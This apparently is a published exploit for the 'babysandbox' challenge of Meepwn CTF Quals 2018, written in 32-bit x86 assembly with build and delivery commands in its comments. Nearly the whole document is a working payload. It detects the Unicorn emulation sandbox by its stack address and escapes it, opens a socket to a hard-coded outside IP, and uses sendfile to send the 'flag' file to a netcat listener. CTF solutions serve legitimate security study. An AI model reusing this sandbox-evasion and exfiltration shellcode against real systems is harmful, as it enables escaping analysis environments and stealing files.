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Created July 19, 2018 18:16
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Meepwn CTF Quals 2018: babysandbox
# Exploit for the "babysandbox" challenge of the Meepwn CTF 2018.
# Written by lenerd for Cyclopropenylidene.
# You can assemble the payload via
# rasm2 -b32 -f exploit.s -B | base64 -w 0
# or use
# gcc -m32 exploit.s -nostdlib
# to build a standalone ELF executable.
# # Send the payload to the challenge:
# $ http --session /tmp/baby.json -v POST payload=$(rasm2 -b32 -f exploit.s -B | base64 -w 0)
# # Wait for a connection on the server:
# $ nc -vkl 16962
# Listening on [] (family 0, port 16962)
# Connection from 42090 received!
# MeePwnCTF{Unicorn_Engine_Is_So_Good_But_Not_Perfect}
.intel_syntax noprefix
.globl _start
# Fool the sandbox:
# If the code is emulated, the stack is always located at 0x1200000. The
# emulation is stopped if any interrupt different from 0x80 is encountered.
cmp esp, 0x1200000
jne continue
int 0x42
# In Linux x86 (32bit) there is only a single syscall `socketcall` (no. 0x66)
# for all socket operations. ebx and ecx are expected to contain an integer
# specifying the function and a pointer to the arguments, respectively.
mov eax, 0x66
mov ebx, 1 # SYS_SOCKET
push 0 # IPPROTO_IP
push 1 # 1 = SOCK_STREAM, 2 = SOCK_DGRAM
push 2 # AF_INET
mov ecx, esp
int 0x80
mov edi, eax # store sockfd in edi
# connect(sockfd, addr, addrlen)
mov eax, 0x66
mov ebx, 3 # SYS_CONNECT
# Construct struct sockaddr_in on the stack.
push 0
push 0
; push 0x0100007f # HOST =
push 0x5cd180b2 # HOST =
push 0x42420002 # PORT = 0x4242 | AF_INET = 2
mov edx, esp
push 16 # addrlen
push edx # addr
push edi # sockfd
mov ecx, esp
int 0x80
# open("flag", 0, 0)
mov eax, 0x5
mov ecx, 0
mov edx, 0
# "flag"
push 0x00000000
push 0x67616c66
mov ebx, esp
int 0x80
mov esi, eax # store filefd in esi
# sendfile(out_fd, in_fd, offset, count)
mov eax, 0xbb
mov ebx, edi # outfd = sockfd
mov ecx, esi # infd = filefd
mov edx, 0 # offset = 0
mov esi, 256 # count = 256
int 0x80
# exit(0)
mov eax, 1
mov ebx, 0
int 0x80
Exploit for the babysandbox challenge of Meepwn CTF Quals 2018
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